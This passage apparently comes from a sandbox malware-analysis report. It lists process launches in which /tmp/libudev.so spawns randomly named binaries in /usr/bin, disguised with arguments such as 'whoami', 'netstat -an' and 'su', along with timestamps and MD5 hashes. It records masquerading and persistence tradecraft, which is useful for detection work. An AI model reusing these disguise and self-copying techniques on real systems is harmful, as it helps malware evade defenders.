                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:19
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/fsqerkomug
                                                                                                                                          Arguments:/usr/bin/fsqerkomug "netstat -an" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e446fff5f449758979147b09c39cef27

                                                                                                                                          Start time:18:44:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/fsqerkomug
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e446fff5f449758979147b09c39cef27

                                                                                                                                          Start time:18:44:19
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:19
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/fsqerkomug
                                                                                                                                          Arguments:/usr/bin/fsqerkomug "ifconfig eth0" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e446fff5f449758979147b09c39cef27

                                                                                                                                          Start time:18:44:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/fsqerkomug
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e446fff5f449758979147b09c39cef27

                                                                                                                                          Start time:18:44:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/fsqerkomug
                                                                                                                                          Arguments:/usr/bin/fsqerkomug whoami 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e446fff5f449758979147b09c39cef27

                                                                                                                                          Start time:18:44:20
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/fsqerkomug
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:e446fff5f449758979147b09c39cef27

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cjrbrkowir
                                                                                                                                          Arguments:/usr/bin/cjrbrkowir "ls -la" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:671fb9e6c4188b2c387307ee031f7816

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cjrbrkowir
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:671fb9e6c4188b2c387307ee031f7816

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cjrbrkowir
                                                                                                                                          Arguments:/usr/bin/cjrbrkowir "echo \"find\"" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:671fb9e6c4188b2c387307ee031f7816

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cjrbrkowir
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:671fb9e6c4188b2c387307ee031f7816

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cjrbrkowir
                                                                                                                                          Arguments:/usr/bin/cjrbrkowir "netstat -an" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:671fb9e6c4188b2c387307ee031f7816

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cjrbrkowir
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:671fb9e6c4188b2c387307ee031f7816

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cjrbrkowir
                                                                                                                                          Arguments:/usr/bin/cjrbrkowir "grep \"A\"" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:671fb9e6c4188b2c387307ee031f7816

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cjrbrkowir
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:671fb9e6c4188b2c387307ee031f7816

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cjrbrkowir
                                                                                                                                          Arguments:/usr/bin/cjrbrkowir "cd /etc" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:671fb9e6c4188b2c387307ee031f7816

                                                                                                                                          Start time:18:44:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cjrbrkowir
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:671fb9e6c4188b2c387307ee031f7816

                                                                                                                                          Start time:18:44:31
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:31
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:31
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ypclxoxcxk
                                                                                                                                          Arguments:/usr/bin/ypclxoxcxk ifconfig 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:189fa45a47a27aedf70f0e8468d9facb

                                                                                                                                          Start time:18:44:31
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ypclxoxcxk
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:189fa45a47a27aedf70f0e8468d9facb

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ypclxoxcxk
                                                                                                                                          Arguments:/usr/bin/ypclxoxcxk uptime 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:189fa45a47a27aedf70f0e8468d9facb

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ypclxoxcxk
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:189fa45a47a27aedf70f0e8468d9facb

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ypclxoxcxk
                                                                                                                                          Arguments:/usr/bin/ypclxoxcxk "ps -ef" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:189fa45a47a27aedf70f0e8468d9facb

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ypclxoxcxk
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:189fa45a47a27aedf70f0e8468d9facb

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ypclxoxcxk
                                                                                                                                          Arguments:/usr/bin/ypclxoxcxk id 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:189fa45a47a27aedf70f0e8468d9facb

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ypclxoxcxk
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:189fa45a47a27aedf70f0e8468d9facb

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ypclxoxcxk
                                                                                                                                          Arguments:/usr/bin/ypclxoxcxk "ifconfig eth0" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:189fa45a47a27aedf70f0e8468d9facb

                                                                                                                                          Start time:18:44:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ypclxoxcxk
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:189fa45a47a27aedf70f0e8468d9facb

                                                                                                                                          Start time:18:44:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uhyqxsqece
                                                                                                                                          Arguments:/usr/bin/uhyqxsqece uptime 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:dac7a7f61f77eb41e695ad36523c8faa

                                                                                                                                          Start time:18:44:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uhyqxsqece
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:dac7a7f61f77eb41e695ad36523c8faa

                                                                                                                                          Start time:18:44:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uhyqxsqece
                                                                                                                                          Arguments:/usr/bin/uhyqxsqece "ifconfig eth0" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:dac7a7f61f77eb41e695ad36523c8faa

                                                                                                                                          Start time:18:44:38
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uhyqxsqece
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:dac7a7f61f77eb41e695ad36523c8faa

                                                                                                                                          Start time:18:44:38
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:38
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:38
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uhyqxsqece
                                                                                                                                          Arguments:/usr/bin/uhyqxsqece uptime 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:dac7a7f61f77eb41e695ad36523c8faa

                                                                                                                                          Start time:18:44:38
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uhyqxsqece
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:dac7a7f61f77eb41e695ad36523c8faa

                                                                                                                                          Start time:18:44:38
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:38
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:38
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uhyqxsqece
                                                                                                                                          Arguments:/usr/bin/uhyqxsqece "route -n" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:dac7a7f61f77eb41e695ad36523c8faa

                                                                                                                                          Start time:18:44:38
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uhyqxsqece
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:dac7a7f61f77eb41e695ad36523c8faa

                                                                                                                                          Start time:18:44:38
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:38
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:38
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uhyqxsqece
                                                                                                                                          Arguments:/usr/bin/uhyqxsqece "ls -la" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:dac7a7f61f77eb41e695ad36523c8faa

                                                                                                                                          Start time:18:44:38
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uhyqxsqece
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:dac7a7f61f77eb41e695ad36523c8faa

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/tiupbsaswr
                                                                                                                                          Arguments:/usr/bin/tiupbsaswr "ifconfig eth0" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:f03f39e4aaf6a5ca7a154972e56405f7

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/tiupbsaswr
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:f03f39e4aaf6a5ca7a154972e56405f7

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/tiupbsaswr
                                                                                                                                          Arguments:/usr/bin/tiupbsaswr ifconfig 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:f03f39e4aaf6a5ca7a154972e56405f7

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/tiupbsaswr
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:f03f39e4aaf6a5ca7a154972e56405f7

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/tiupbsaswr
                                                                                                                                          Arguments:/usr/bin/tiupbsaswr id 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:f03f39e4aaf6a5ca7a154972e56405f7

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/tiupbsaswr
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:f03f39e4aaf6a5ca7a154972e56405f7

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/tiupbsaswr
                                                                                                                                          Arguments:/usr/bin/tiupbsaswr "ls -la" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:f03f39e4aaf6a5ca7a154972e56405f7

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/tiupbsaswr
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:f03f39e4aaf6a5ca7a154972e56405f7

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:44
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/tiupbsaswr
                                                                                                                                          Arguments:/usr/bin/tiupbsaswr who 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:f03f39e4aaf6a5ca7a154972e56405f7

                                                                                                                                          Start time:18:44:45
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/tiupbsaswr
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:f03f39e4aaf6a5ca7a154972e56405f7

                                                                                                                                          Start time:18:44:50
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:50
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:50
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uijxdyxaco
                                                                                                                                          Arguments:/usr/bin/uijxdyxaco "cd /etc" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:4f925977b7fa1d98ec538468e3547e28

                                                                                                                                          Start time:18:44:50
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uijxdyxaco
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:4f925977b7fa1d98ec538468e3547e28

                                                                                                                                          Start time:18:44:50
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:50
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:50
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uijxdyxaco
                                                                                                                                          Arguments:/usr/bin/uijxdyxaco ls 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:4f925977b7fa1d98ec538468e3547e28

                                                                                                                                          Start time:18:44:50
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uijxdyxaco
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:4f925977b7fa1d98ec538468e3547e28

                                                                                                                                          Start time:18:44:50
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:50
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:50
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uijxdyxaco
                                                                                                                                          Arguments:/usr/bin/uijxdyxaco su 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:4f925977b7fa1d98ec538468e3547e28

                                                                                                                                          Start time:18:44:50
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/uijxdyxaco
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:4f925977b7fa1d98ec538468e3547e28

                                                                                                                                          Start time:18:44:50
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:44:50
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
